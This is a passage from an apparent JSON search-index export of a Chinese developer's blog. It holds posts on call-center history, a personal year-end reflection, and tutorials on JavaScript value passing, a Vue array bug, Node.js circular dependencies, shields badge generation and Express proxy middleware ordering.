呼叫中心又称为客户服务中心。有以下关键词\nCTI 通信网络 计算机 企业级 高质量、高效率、全方位、综合信息服务 呼叫中心历史 1956年美国泛美航空公司建成世界第一家呼叫中心。\n阶段 行业范围 技术 功能与意义 第一代呼叫中心 民航 PBX、电话排队 主要服务由人工完成 第二代呼叫中心 银行、生活 IVR(交互式语音应答)、DTMF 显著提高工作效率,提供全天候服务 第三代呼叫中心 CTI(电脑计算机集成) 语音数据同步,客户信息存储与查阅,个性化服务,自动化 第四代呼叫中心 接入电子邮件、互联网、手机短信等 多渠道接入、多渠道统一排队 第五代呼叫中心 接入社交网络、社交媒体(微博、微信等) 文本交谈,音频视频沟通 呼叫中心分类 按呼叫方式分类 外呼型呼叫中心(如电话营销) 客服型呼叫中心(如客户服务) 混合型呼叫中心 (如营销和客服) 按技术架构分类 交换机 板卡 软交换(IPCC) 【交换机类型呼叫中心】\n","permalink":"https://wdd.js.org/posts/2019/01/call-center-brief-history/","summary":"什么是呼叫中心? 呼叫中心又称为客户服务中心。有以下关键词\nCTI 通信网络 计算机 企业级 高质量、高效率、全方位、综合信息服务 呼叫中心历史 1956年美国泛美航空公司建成世界第一家呼叫中心。\n阶段 行业范围 技术 功能与意义 第一代呼叫中心 民航 PBX、电话排队 主要服务由人工完成 第二代呼叫中心 银行、生活 IVR(交互式语音应答)、DTMF 显著提高工作效率,提供全天候服务 第三代呼叫中心 CTI(电脑计算机集成) 语音数据同步,客户信息存储与查阅,个性化服务,自动化 第四代呼叫中心 接入电子邮件、互联网、手机短信等 多渠道接入、多渠道统一排队 第五代呼叫中心 接入社交网络、社交媒体(微博、微信等) 文本交谈,音频视频沟通 呼叫中心分类 按呼叫方式分类 外呼型呼叫中心(如电话营销) 客服型呼叫中心(如客户服务) 混合型呼叫中心 (如营销和客服) 按技术架构分类 交换机 板卡 软交换(IPCC) 【交换机类型呼叫中心】","title":"呼叫中心简史"},{"content":"2008-2018 十年,往事如昨 2018年已经是昨天,今天是2019的第一天。\n2008年已经是10年前,10年前的傍晚,我走在南京仙林的一个大街上,提着一瓶矿泉水,擦着额头的汗水,仰头看着大屏幕上播放着北京奥运会的开幕式。\n10年前的夏天,我带着一部诺基亚手机功能机,独自一人去了南京。\n坐过绣球公园的石凳,穿过天妃宫的回廊,吹过阅江楼的凉爽的江风,踏着古老斑驳的城墙,在林荫小路的长椅上,我想着10年后我会在哪里?做着什么事情?\n往事如昨,而今将近而立,但是依然觉得自己还是10年前的那个独自出去玩的小男孩。\n2018 读了10年都没有读完的书,五味杂陈 2018年,在我做手术前,我觉得自己除了工作的时间外,大多数时间都在看书。2018年这一年看的书,要比2008到2018年这十年间的看的书都要多。这都归功于我对每天的看书都有定量的计划,一旦按照这个计划实行几个月,积累的效果还是非常明显的。\n2018年,手机几乎成为人的四肢之外的第五肢。对大多人来说,上厕所可以不带纸,但是不能不带手机。\n各种APP, 都在极力的吸引用户多花点时间在自己身上 信息流充斥着各种毫无营养,专门吸人眼球的垃圾新闻,但是这种新闻的阅读量还是蛮大的 各种借钱,信用卡,花呗等都像青楼的小姐,妩媚的笑容,说道:官人,进来做一做 共享单车,在今年退潮之后,才发现自己都在裸泳 比特币,挖矿机。不知道谁割了谁的韭菜,总希望有下一个傻子来接盘,最后发现自己可能就是最后一个傻子 AI,人工智能很火,仿佛就快要进入终结者那样的世界 锤子垮了,曾经吹过的牛逼,曾经理想主义终于脱去那又黑又亮的面具 图灵测试(The Turing test)由艾伦·麦席森·图灵发明,指测试者与被测试者(一个人和一台机器)隔开的情况下,通过一些装置(如键盘)向被测试者随意提问。 进行多次测试后,如果有超过30%的测试者不能确定出被测试者是人还是机器,那么这台机器就通过了测试,并被认为具有人类智能。图灵测试一词来源于计算机科学和密码学的先驱阿兰·麦席森·图灵写于1950年的一篇论文《计算机器与智能》,其中30%是图灵对2000年时的机器思考能力的一个预测,目前我们已远远落后于这个预测。\n最后说一下图灵测试,在AI方面,这个测试无人不知。一个机器如果通过了图灵测试,则说明该机器具有了智能。但是三体的作者大刘曾经说过一句话,给我一种醍醐灌顶的感觉,假如一个机器人有能力通过图灵测试,却假装无法通过,你说这个机器是否具有人工智能。所以大刘的这种说法才更加让人恐惧。机器人能通过图灵测试,只说明这个机器人具有了智能。但是现阶段的智能只不过是条件反射,或者是基于概率计算的结果。后者这种能通过测试,却假装无法通过的智能。这不仅仅是智能,而是机器的城府。\n有智能的机器并不可怕,有城府的机器人才是真正的可怕。\n如果梦中更加幸福快乐,为什么要回到现实 火影的最后,大筒木辉夜使用无限月读将世界上的所有人都带入梦境,每个人的查克拉都被吸取,并作为神树的养料。\n如果真的存在大筒木这样的上帝,那么时间就是查克拉。人类唯一真正拥有过的东西,时间,将作为神树的养料,从每个人身上提取。\n各种具有吸引力的术,其实可以理解为无限月读,让人沉醉于梦幻中。\n如果梦中更加幸福快乐,为什么要回到现实中承受压力与悲哀呢? 
目前我无法回答自己的这个问题,期待2019年我可以得到这个答案。\n工作方面 2019年,我会做一些后端方面的工作,努力加油吧。\n","permalink":"https://wdd.js.org/posts/2018/01/where-time-you-spend-what-you-will-be/","summary":"2008-2018 十年,往事如昨 2018年已经是昨天,今天是2019的第一天。\n2008年已经是10年前,10年前的傍晚,我走在南京仙林的一个大街上,提着一瓶矿泉水,擦着额头的汗水,仰头看着大屏幕上播放着北京奥运会的开幕式。\n10年前的夏天,我带着一部诺基亚手机功能机,独自一人去了南京。\n坐过绣球公园的石凳,穿过天妃宫的回廊,吹过阅江楼的凉爽的江风,踏着古老斑驳的城墙,在林荫小路的长椅上,我想着10年后我会在哪里?做着什么事情?\n往事如昨,而今将近而立,但是依然觉得自己还是10年前的那个独自出去玩的小男孩。\n2018 读了10年都没有读完的书,五味杂陈 2018年,在我做手术前,我觉得自己除了工作的时间外,大多数时间都在看书。2018年这一年看的书,要比2008到2018年这十年间的看的书都要多。这都归功于我对每天的看书都有定量的计划,一旦按照这个计划实行几个月,积累的效果还是非常明显的。\n2018年,手机几乎成为人的四肢之外的第五肢。对大多人来说,上厕所可以不带纸,但是不能不带手机。\n各种APP, 都在极力的吸引用户多花点时间在自己身上 信息流充斥着各种毫无营养,专门吸人眼球的垃圾新闻,但是这种新闻的阅读量还是蛮大的 各种借钱,信用卡,花呗等都像青楼的小姐,妩媚的笑容,说道:官人,进来做一做 共享单车,在今年退潮之后,才发现自己都在裸泳 比特币,挖矿机。不知道谁割了谁的韭菜,总希望有下一个傻子来接盘,最后发现自己可能就是最后一个傻子 AI,人工智能很火,仿佛就快要进入终结者那样的世界 锤子垮了,曾经吹过的牛逼,曾经理想主义终于脱去那又黑又亮的面具 图灵测试(The Turing test)由艾伦·麦席森·图灵发明,指测试者与被测试者(一个人和一台机器)隔开的情况下,通过一些装置(如键盘)向被测试者随意提问。 进行多次测试后,如果有超过30%的测试者不能确定出被测试者是人还是机器,那么这台机器就通过了测试,并被认为具有人类智能。图灵测试一词来源于计算机科学和密码学的先驱阿兰·麦席森·图灵写于1950年的一篇论文《计算机器与智能》,其中30%是图灵对2000年时的机器思考能力的一个预测,目前我们已远远落后于这个预测。\n最后说一下图灵测试,在AI方面,这个测试无人不知。一个机器如果通过了图灵测试,则说明该机器具有了智能。但是三体的作者大刘曾经说过一句话,给我一种醍醐灌顶的感觉,假如一个机器人有能力通过图灵测试,却假装无法通过,你说这个机器是否具有人工智能。所以大刘的这种说法才更加让人恐惧。机器人能通过图灵测试,只说明这个机器人具有了智能。但是现阶段的智能只不过是条件反射,或者是基于概率计算的结果。后者这种能通过测试,却假装无法通过的智能。这不仅仅是智能,而是机器的城府。\n有智能的机器并不可怕,有城府的机器人才是真正的可怕。\n如果梦中更加幸福快乐,为什么要回到现实 火影的最后,大筒木辉夜使用无限月读将世界上的所有人都带入梦境,每个人的查克拉都被吸取,并作为神树的养料。\n如果真的存在大筒木这样的上帝,那么时间就是查克拉。人类唯一真正拥有过的东西,时间,将作为神树的养料,从每个人身上提取。\n各种具有吸引力的术,其实可以理解为无限月读,让人沉醉于梦幻中。\n如果梦中更加幸福快乐,为什么要回到现实中承受压力与悲哀呢? 目前我无法回答自己的这个问题,期待2019年我可以得到这个答案。\n工作方面 2019年,我会做一些后端方面的工作,努力加油吧。","title":"时间花在哪里,你就会成为什么样的人"},{"content":"1. demo 如果你对下面的代码没有任何疑问就能自信的回答出输出的内容,那么本篇文章就不值得你浪费时间了。\nvar var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; var3[0] = \u0026#39;changed\u0026#39; var3 = \u0026#39;changed\u0026#39; } test(var1, var3) console.log(var1, var2, var3, var4) 2. 
深入理解原始类型 原始类型有5个 Undefined, Null, Boolean, Number, String\n2.1. 原始类型变量没有属性和方法 // 抬杠, 下面的length属性,toString方法怎么有属性和方法呢? var a = \u0026#39;oooo\u0026#39; a.length a.toString 原始类型中,有三个特殊的引用类型Boolean, Number, String,在操作原始类型时,原始类型变量会转换成对应的基本包装类型变量去操作。参考JavaScript高级程序设计 5.6 基本包装类型。\n2.2. 原始类型值不可变 原始类型的变量的值是不可变的,只能给变量赋予新的值。\n下面给出例子\n// str1 开始的值是aaa var str1 = \u0026#39;aaa\u0026#39; // 首先创建一个能容纳6个字符串的新字符串 // 然后再这个字符串中填充 aaa和bbb // 最后销毁字符串 aaa和bbb // 而不能理解成在str1的值aaa后追加bbb str1 = str1 + \u0026#39;bbb\u0026#39; 其他原始类型的值也是不可变的, 例如数值类型的。\n2.3. 原始类型值是字面量 3. 变量和值有什么区别? 不是每一个值都有地址,但每一个变量有。《Go程序设计语言》 变量没有类型,值有。变量可以用来保存任何类型的值。《You-Dont-Know-JS》 变量都是有内存地址的,变量可以用来保存各种类型的值;不同类型的值,占用的空间不同。\nvar a = 1 typeof a // 检测的不是变量a的类型,而是a的值1的类型 4. 变量访问有哪些方式? 变量访问的方式有两种:\n按值访问 按引用访问 在JS中,五种基本类型Undefined, Null, Boolean, Number, String是按照值访问的。基本类型变量的值就是字面上表示的值。而引用类型的值是指向该对象的指针,而指针可以理解为内存地址。\n可以理解基本类型的变量的值,就是字面上写的数值。而引用类型的值则是一个内存地址。但是这个内存地址,对于程序来说,是透明不可见的。无论是Get还是Set都无法操作这个内存地址。\n下面是个示意表格。\n语句 变量 值 Get 访问类型 var a = 1 a 1 1 按值 var a = [] a 0x00000320 [] 按引用 抬杠 Undefined, Null, Boolean, Number是基本类型可以理解,因为这些类型的变量所占用的内存空间都是大小固定的。但是string类型的变量,字符串的长短都是不一样的,也就是说,字符串占用的内存空间大小是不固定的,为什么string被列为按值访问呢?\n基本类型和引用类型的本质区别是,当这个变量被分配值时,它需要向操作系统申请内存资源,如果你向操作系统申请的内存空间的大小是固定的,那么就是基本类型,反之,则为引用类型。\n5. 例子的解释 var var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; // a var3[0] = \u0026#39;changed\u0026#39; // b var3 = \u0026#39;changed\u0026#39; // c } test(var1, var3) console.log(var1, var2, var3, var4) 上面的js分为两个调用栈。\n图1 外层的调用栈。有四个变量v1、v2、v3、v4 图2 调用test时传参,内层的v1、v3会屏蔽外层的v1、v3。内层的v1,v3和外层的v1、v3内存地址是不同的。内层v1和外层v1已经没有任何关系了,但是内层的v3和外层v3仍然指向同一个数组。 图3 内层的v1的值被改变成\u0026rsquo;changed\u0026rsquo;, v3[0]的值被改变为\u0026rsquo;changed\u0026rsquo;。 图4 内层v3的值被重写为字符串changed, 彻底断了与外层v3联系。 图5 当test执行完毕,内层的v1和v3将不会存在,0x75和0x76位置的内存空间也会被释放 最终的输出:\n1 true [\u0026#34;changed\u0026#34;, 2, 3] [\u0026#34;changed\u0026#34;, 2, 3] 6. 
如何深入学习JS、Node.js 看完stackoverflow上两个按照投票数量的榜单\nJavaScript问题榜单 Node.js问题榜单 如果学习有捷径的话,踩一遍别人踩过的坑,可能就是捷径。\n7. 参考 is-javascript-a-pass-by-reference-or-pass-by-value-language\nIs number in JavaScript immutable? duplicate\nImmutability in JavaScript\nthe-secret-life-of-javascript-primitives\nJavaScript data types and data structures\nUnderstanding Javascript immutable variable\nExplaining Value vs. Reference in Javascript\nYou-Dont-Know-JS\n《JavaScript高级程序设计(第3版)》[美] 尼古拉斯·泽卡斯\n","permalink":"https://wdd.js.org/posts/2018/12/deep-in-javascript-variable-value-arguments/","summary":"1. demo 如果你对下面的代码没有任何疑问就能自信的回答出输出的内容,那么本篇文章就不值得你浪费时间了。\nvar var1 = 1 var var2 = true var var3 = [1,2,3] var var4 = var3 function test (var1, var3) { var1 = \u0026#39;changed\u0026#39; var3[0] = \u0026#39;changed\u0026#39; var3 = \u0026#39;changed\u0026#39; } test(var1, var3) console.log(var1, var2, var3, var4) 2. 深入理解原始类型 原始类型有5个 Undefined, Null, Boolean, Number, String\n2.1. 原始类型变量没有属性和方法 // 抬杠, 下面的length属性,toString方法怎么有属性和方法呢? var a = \u0026#39;oooo\u0026#39; a.length a.toString 原始类型中,有三个特殊的引用类型Boolean, Number, String,在操作原始类型时,原始类型变量会转换成对应的基本包装类型变量去操作。参考JavaScript高级程序设计 5.6 基本包装类型。\n2.2. 原始类型值不可变 原始类型的变量的值是不可变的,只能给变量赋予新的值。\n下面给出例子\n// str1 开始的值是aaa var str1 = \u0026#39;aaa\u0026#39; // 首先创建一个能容纳6个字符串的新字符串 // 然后再这个字符串中填充 aaa和bbb // 最后销毁字符串 aaa和bbb // 而不能理解成在str1的值aaa后追加bbb str1 = str1 + \u0026#39;bbb\u0026#39; 其他原始类型的值也是不可变的, 例如数值类型的。","title":"深入理解 JavaScript中的变量、值、函数传参"},{"content":"当函数执行到this.agents.splice()时,我设置了断点。发现传参index是0,但是页面上的列表项对应的第一行数据没有被删除,\nWTF!!! 
这是什么鬼!然后我打开Vue Devtools, 然后刷新了一下,发现那个数组的第一项还是存在的。什么鬼??\nremoveOneAgentByIndex: function (index) { this.agents.splice(index, 1) } 然后我就谷歌了一下,发现这个splice not working properly my object list VueJs, 大概意思是v-for的时候最好给列表项绑定:key=。然后我试了这个方法,发现没啥作用。\n最终我决定,单步调试,如果我发现该问题出在Vue自身,那我就该抛弃Vue, 学习React了\n单步调试中出现一个异常的情况,removeOneAgentByIndex是被A函数调用的,A函数由websocket事件驱动。正常情况下应该触发一次的事件,服务端却发送了两次到客户端。由于事件重复,第一次执行A删除时,实际上removeOneAgentByIndex是执行成功了,但是重复的第二个事件到来时,A函数又往agents数组中添加了一项。导致看起来,removeOneAgentByIndex函数执行起来似乎没有什么作用。而且这两个重复的事件几乎是在同一时间发送到客户端,所以我几乎花了将近一个小时去解决这个bug。引起这个bug的原因是事件重复,所以我在前端代码中加入事件去重功能,最终解决这个问题。\n我记得之前看过一篇文章,一个开发者通过回调函数计费,回调函数是由事件触发,但是没想到有时候事件会重发,导致重复计费。后来这名开发者在自己的代码中加入事件去重的功能,最终解决了这个问题。\n事后总结:我觉得我不该怀疑Vue这种库出现了问题,但是我又不禁去怀疑。\n通过这个bug, 我也学到了第二种方法,可以删除Vue数组中的某一项,参考下面代码。\n// Only in 2.2.0+: Also works with Array + index. removeOneAgentByIndex: function (index) { this.$delete(this.agents, index) } 另外Vue devtools有时候并不会实时的观测到组件属性的变化,即使点了Refresh按钮。如果点了Refresh按钮还不行,那建议你重新打开谷歌浏览器的devtools面板。\n","permalink":"https://wdd.js.org/posts/2018/12/vue-array-splice-not-work/","summary":"当函数执行到this.agents.splice()时,我设置了断点。发现传参index是0,但是页面上的列表项对应的第一行数据没有被删除,\nWTF!!! 这是什么鬼!然后我打开Vue Devtools, 然后刷新了一下,发现那个数组的第一项还是存在的。什么鬼??\nremoveOneAgentByIndex: function (index) { this.agents.splice(index, 1) } 然后我就谷歌了一下,发现这个splice not working properly my object list VueJs, 大概意思是v-for的时候最好给列表项绑定:key=。然后我试了这个方法,发现没啥作用。\n最终我决定,单步调试,如果我发现该问题出在Vue自身,那我就该抛弃Vue, 学习React了\n单步调试中出现一个异常的情况,removeOneAgentByIndex是被A函数调用的,A函数由websocket事件驱动。正常情况下应该触发一次的事件,服务端却发送了两次到客户端。由于事件重复,第一次执行A删除时,实际上removeOneAgentByIndex是执行成功了,但是重复的第二个事件到来时,A函数又往agents数组中添加了一项。导致看起来,removeOneAgentByIndex函数执行起来似乎没有什么作用。而且这两个重复的事件几乎是在同一时间发送到客户端,所以我几乎花了将近一个小时去解决这个bug。引起这个bug的原因是事件重复,所以我在前端代码中加入事件去重功能,最终解决这个问题。\n我记得之前看过一篇文章,一个开发者通过回调函数计费,回调函数是由事件触发,但是没想到有时候事件会重发,导致重复计费。后来这名开发者在自己的代码中加入事件去重的功能,最终解决了这个问题。\n事后总结:我觉得我不该怀疑Vue这种库出现了问题,但是我又不禁去怀疑。\n通过这个bug, 我也学到了第二种方法,可以删除Vue数组中的某一项,参考下面代码。\n// Only in 2.2.0+: Also works with Array + index. 
removeOneAgentByIndex: function (index) { this.$delete(this.agents, index) } 另外Vue devtools有时候并不会实时的观测到组件属性的变化,即使点了Refresh按钮。如果点了Refresh按钮还不行,那建议你重新打开谷歌浏览器的devtools面板。","title":"WTF!! Vue数组splice方法无法正常工作"},{"content":"本文重点是讲解如何解决循环依赖这个问题。关心这个问题是如何产生的,可以自行谷歌。\n如何重现这个问题 // a.js const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const {sayA} = require(\u0026#39;./a.js\u0026#39;) sayA() function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } 执行下面的代码\n➜ test git:(master) ✗ node a.js /Users/dd/wj-gitlab/tools/test/b.js:3 sayA() ^ TypeError: sayA is not a function at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/b.js:3:1) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.js:497:12) at Function.Module._load (module.js:489:3) at Module.require (module.js:579:17) at require (internal/module.js:11:18) at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/a.js:1:78) at Module._compile (module.js:635:30) sayA is not a function那么sayA是个什么呢,实际上它是 undefined\n遇到这种问题时,你最好能意识到可能是循环依赖的问题,否则找问题可能事倍功半。\n如何找到循环依赖的文件 上文的示例代码很简单,2个文件,很容易找出循环依赖。如果有十几个文件,手工去找循环依赖的文件,也是非常麻烦的。\n下面推荐一个工具 madge, 它可以可视化的查看文件之间的依赖关系。\n注意下图1,以cli.js为起点,所有的箭头都是向右展开的,这说明没有循环依赖。如果有箭头出现向左逆流,那么就可能是循环依赖的点。\n图2中,出现向左的箭头,说明出现了循环依赖,说明要在此处断开循环。\n如何解决循环依赖 方案1: 先导出自身模块 将module.exports放到文件头部,先将自身模块导出,然后再导入其他模块。\n来自:http://maples7.com/2016/08/17/cyclic-dependencies-in-node-and-its-solution/\n// a.js module.exports = { sayA } const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } // b.js module.exports = { sayB } const {sayA} = require(\u0026#39;./a.js\u0026#39;) console.log(typeof sayA) sayA() function sayB () { console.log(\u0026#39;say B\u0026#39;) } 方案2: 间接调用 
通过引入一个event的消息传递,让多个模块可以间接传递消息,多个模块之间也可以通过发消息相互调用。\n// a.js require(\u0026#39;./b.js\u0026#39;) const bus = require(\u0026#39;./bus.js\u0026#39;) bus.on(\u0026#39;sayA\u0026#39;, sayA) setTimeout(() =\u0026gt; { bus.emit(\u0026#39;sayB\u0026#39;) }, 0) function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const bus = require(\u0026#39;./bus.js\u0026#39;) bus.on(\u0026#39;sayB\u0026#39;, sayB) setTimeout(() =\u0026gt; { bus.emit(\u0026#39;sayA\u0026#39;) }, 0) function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } // bus.js const EventEmitter = require(\u0026#39;events\u0026#39;) class MyEmitter extends EventEmitter {} module.exports = new MyEmitter() 总结 出现循环依赖,往往是代码的结构出现了问题。应当主动去避免循环依赖这种问题,但是遇到这种问题,无法避免时,也要意识到是循环依赖导致的问题,并找方案解决。\n最后给出一个有意思的问题,下面的代码运行node a.js会输出什么?为什么会这样?\n// a.js var moduleB = require(\u0026#39;./b.js\u0026#39;) setInterval(() =\u0026gt; { console.log(\u0026#39;setInterval A\u0026#39;) }, 500) setTimeout(() =\u0026gt; { console.log(\u0026#39;setTimeout moduleA\u0026#39;) moduleB.sayB() }, 2000) function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js var moduleA = require(\u0026#39;./a.js\u0026#39;) setInterval(() =\u0026gt; { console.log(\u0026#39;setInterval B\u0026#39;) }, 500) setTimeout(() =\u0026gt; { console.log(\u0026#39;setTimeout moduleB\u0026#39;) moduleA.sayA() }, 2000) function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } ","permalink":"https://wdd.js.org/posts/2018/10/how-to-fix-circular-dependencies-in-node-js/","summary":"本文重点是讲解如何解决循环依赖这个问题。关心这个问题是如何产生的,可以自行谷歌。\n如何重现这个问题 // a.js const {sayB} = require(\u0026#39;./b.js\u0026#39;) sayB() function sayA () { console.log(\u0026#39;say A\u0026#39;) } module.exports = { sayA } // b.js const {sayA} = require(\u0026#39;./a.js\u0026#39;) sayA() function sayB () { console.log(\u0026#39;say B\u0026#39;) } module.exports = { sayB } 执行下面的代码\n➜ test 
git:(master) ✗ node a.js /Users/dd/wj-gitlab/tools/test/b.js:3 sayA() ^ TypeError: sayA is not a function at Object.\u0026lt;anonymous\u0026gt; (/Users/dd/wj-gitlab/tools/test/b.js:3:1) at Module._compile (module.js:635:30) at Object.Module._extensions..js (module.js:646:10) at Module.load (module.js:554:32) at tryModuleLoad (module.","title":"Node.js 如何找出循环依赖的文件?如何解决循环依赖问题?"},{"content":"shields小徽章介绍 一般开源项目都会有一些小徽章来标识项目的状态信息,并且这些信息是会自动更新的。在shields的官网https://shields.io/#/, 上面有各种各样的小图标,并且有很多自定义的方案。\n起因:如何给私有部署的jenkins制作shields服务? 私有部署的jenkins是用来打包docker镜像的,而我想获取最新的项目打包的jenkins镜像信息。但是私有的jenkins项目信息,公网的shields服务是无法获取其信息的。那么如果搭建一个私有的shields服务呢?\n第一步:如何根据一些信息,制作svg图标 查看shields图标的源码,可以看到这些图标都是svg格式的图标。然后的思路就是,将文字信息转成svg图标。最后我发现这个思路是个死胡同,\n有个npm包叫做,text-to-svg, 似乎可以将文本转成svg, 但是看了文本转svg的效果,果断就放弃了。\n最后回到起点,看了shields官方仓库,发现一个templates目录,豁然开朗。原来svg图标是由svg的模板生成的,每次生成图标只需要将信息添加到模板中,然后就可以渲染出svg字符串了。\n顺着这个思路,发现一个包shields-lightweight\nvar shields = require(\u0026#39;shields-lightweight\u0026#39;); var svgBadge = shields.svg(\u0026#39;subject\u0026#39;, \u0026#39;status\u0026#39;, \u0026#39;red\u0026#39;, \u0026#39;flat\u0026#39;); 这个包的确可以生成和shields一样的小徽章,但是如果徽章中有中文,那么中文就会溢出。因为一个中文字符的宽度要比一个英文字符宽很多。\n所以我就fork了这个项目,重写了图标宽度计算的方式。shields-less\nnpm install shields-less var shieldsLess = require(\u0026#39;shields-less\u0026#39;) var svgBadge = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, style: \u0026#39;square\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, leftColor: \u0026#39;#e64a19\u0026#39;, rightColor: \u0026#39;#448aff\u0026#39;, style: \u0026#39;square\u0026#39; // just two style: square and plat(default) }) 渲染后的效果,查看在线demo: https://wdd.js.org/shields-less/example/\nshields服务开发 
shields服务其实很简单。架构如下,客户端浏览器发送一个请求,向shields服务,shield服务解析请求,并向jenkins服务发送请求,jenkins服务每个项目都有json的http接口,可以获取项目信息的。shields将从jenkins获取的信息封装到svg小图标中,然后将svg小图标发送到客户端。\n最终效果 ","permalink":"https://wdd.js.org/posts/2018/10/how-to-make-shields-badge/","summary":"shields小徽章介绍 一般开源项目都会有一些小徽章来标识项目的状态信息,并且这些信息是会自动更新的。在shields的官网https://shields.io/#/, 上面有各种各样的小图标,并且有很多自定义的方案。\n起因:如何给私有部署的jenkins制作shields服务? 私有部署的jenkins是用来打包docker镜像的,而我想获取最新的项目打包的jenkins镜像信息。但是私有的jenkins项目信息,公网的shields服务是无法获取其信息的。那么如果搭建一个私有的shields服务呢?\n第一步:如何根据一些信息,制作svg图标 查看shields图标的源码,可以看到这些图标都是svg格式的图标。然后的思路就是,将文字信息转成svg图标。最后我发现这个思路是个死胡同,\n有个npm包叫做,text-to-svg, 似乎可以将文本转成svg, 但是看了文本转svg的效果,果断就放弃了。\n最后回到起点,看了shields官方仓库,发现一个templates目录,豁然开朗。原来svg图标是由svg的模板生成的,每次生成图标只需要将信息添加到模板中,然后就可以渲染出svg字符串了。\n顺着这个思路,发现一个包shields-lightweight\nvar shields = require(\u0026#39;shields-lightweight\u0026#39;); var svgBadge = shields.svg(\u0026#39;subject\u0026#39;, \u0026#39;status\u0026#39;, \u0026#39;red\u0026#39;, \u0026#39;flat\u0026#39;); 这个包的确可以生成和shields一样的小徽章,但是如果徽章中有中文,那么中文就会溢出。因为一个中文字符的宽度要比一个英文字符宽很多。\n所以我就fork了这个项目,重写了图标宽度计算的方式。shields-less\nnpm install shields-less var shieldsLess = require(\u0026#39;shields-less\u0026#39;) var svgBadge = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, style: \u0026#39;square\u0026#39; }) var svgBadge2 = shieldsLess.svg({ leftText: \u0026#39;npm 黄河远上白云间\u0026#39;, rightText: \u0026#39;hello 世界\u0026#39;, leftColor: \u0026#39;#e64a19\u0026#39;, rightColor: \u0026#39;#448aff\u0026#39;, style: \u0026#39;square\u0026#39; // just two style: square and plat(default) }) 渲染后的效果,查看在线demo: https://wdd.","title":"shields小徽章是如何生成的?以及搭建自己的shield服务器"},{"content":"前后端分离应用的架构 在前后端分离架构中,为了避免跨域以及暴露内部服务地址。一般来说,我会在Express这层中加入一个反向代理。\n所有向后端服务访问的请求,都通过代理转发到内部的各个服务。\n这个反向代理服务器,做起来很简单。用http-proxy-middleware这个模块,几行代码就可以搞定。\n// app.js 
Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) http-proxy-middleware实际上是对于node-http-proxy的更加简便的封装。node-http-proxy是http-proxy-middleware的底层包,如果node-http-proxy有问题,那么这个问题就会影响到http-proxy-middleware这个包。\n最近的bug http-proxy-middleware最近有个问题,请求体在被代理转发前,如果请求体被解析了。那么后端服务将会收不到请求结束的消息,从浏览器的网络面板可以看出,一个请求一直在pending状态。\nCannot proxy after parsing body #299, 实际上这个问题在node-http-proxy也被提出过,而且处于open状态。POST fails/hangs examples to restream also not working #1279\n目前这个bug还是处于open状态,但是还是有解决方案的。就是将请求体解析的中间件挂载在代理之后。\n下面的代码,express.json()会对json格式的请求体进行解析。方案1在代理前就进行body解析,所有格式是json的请求体都会被解析。\n但是有些走代理的请求,如果我们并不关心请求体的内容是什么,实际上我们可以不解析那些走代理的请求。所以,可以先挂载代理中间件,然后挂载请求体解析中间件,最后挂载内部的一些接口服务。\n// 方案1 bad app.use(express.json()) Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) // 方案2 good Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) app.use(express.json()) app.use(\u0026#39;/api\u0026#39;, (req, res, next)=\u0026gt; { }) 总结 经过这个问题,我对Express中间件的挂载顺序有了更加深刻的认识。\n同时,在使用第三方包的过程中,如果该包bug,那么也需要自行找出合适的解决方案。而这个能力,往往就是高手与新手的区别。\n","permalink":"https://wdd.js.org/posts/2018/09/express-middleware-order-proxy-problem/","summary":"前后端分离应用的架构 在前后端分离架构中,为了避免跨域以及暴露内部服务地址。一般来说,我会在Express这层中加入一个反向代理。\n所有向后端服务访问的请求,都通过代理转发到内部的各个服务。\n这个反向代理服务器,做起来很简单。用http-proxy-middleware这个模块,几行代码就可以搞定。\n// app.js Object.keys(proxyTable).forEach(function (context) { app.use(proxyMiddleware(context, proxyTable[context])) }) http-proxy-middleware实际上是对于node-http-proxy的更加简便的封装。node-http-proxy是http-proxy-middleware的底层包,如果node-http-proxy有问题,那么这个问题就会影响到http-proxy-middleware这个包。\n最近的bug http-proxy-middleware最近有个问题,请求体在被代理转发前,如果请求体被解析了。那么后端服务将会收不到请求结束的消息,从浏览器的网络面板可以看出,一个请求一直在pending状态。\nCannot proxy after parsing body #299, 实际上这个问题在node-http-proxy也被提出过,而且处于open状态。POST fails/hangs examples to 
